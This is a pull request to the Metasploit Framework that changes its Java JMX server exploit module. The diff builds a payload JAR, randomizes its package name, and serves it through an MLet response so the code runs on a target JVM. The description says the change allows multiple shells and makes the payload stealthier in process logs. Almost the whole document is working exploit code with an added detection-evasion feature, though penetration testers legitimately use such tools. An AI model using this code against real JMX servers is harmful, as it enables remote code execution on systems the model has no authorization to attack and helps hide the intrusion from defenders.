### PR TITLE
Java JMX Package Name Randomization

### DIFF
--- a/modules/exploits/multi/misc/java_jmx_server.rb
+++ b/modules/exploits/multi/misc/java_jmx_server.rb
@@ -58,10 +58,20 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
+    if @jar.nil?
+      p = regenerate_payload(cli)
+      @jar = p.encoded_jar({"random":true})
+      paths = [
+        ["metasploit", "JMXPayloadMBean.class"],
+        ["metasploit", "JMXPayload.class"],
+      ]
+      @jar.add_files(paths, MetasploitPayloads.path('java'))
+    end
+
     if request.uri =~ /mlet$/
       jar = "#{rand_text_alpha(8 + rand(8))}.jar"
 
-      mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "
+      mlet = "<HTML><mlet code=\"#{@jar.substitutions["metasploit"]}.JMXPayload\" "
       mlet << "archive=\"#{jar}\" "
       mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
       mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
@@ -73,20 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
       print_status("Replied to request for mlet")
     elsif request.uri =~ /\.jar$/i
-      p = regenerate_payload(cli)
-      jar = p.encoded_jar
-      paths = [
-        ["metasploit", "JMXPayloadMBean.class"],
-        ["metasploit", "JMXPayload.class"],
-      ]
-      jar.add_files(paths, MetasploitPayloads.path('java'))
-
-      send_response(cli, jar.pack,
+      send_response(cli, @jar.pack,
         {
           'Content-Type' => 'application/java-archive',
           'Pragma'       => 'no-cache'
         })
-
       print_status("Replied to request for payload JAR")
     end
   end


### PR DESCRIPTION
This change randomizes the MBean package name inside the jar.

This achieves two goals:

A. Most importantly, this allows multiple session from the same exploit to work at once. This is needed if the attacker's IP has changed or there is a collaborator attempting to get a shell.
Previously, without package name randomization, the exploit would fail because the IP address is packaged within the JAR and once loaded by the JVM, would not be reloaded again since a package+ class combo is already loaded.

B. This allows the payload to be a little more stealthy and not stand out like a sore thumb in the process logs.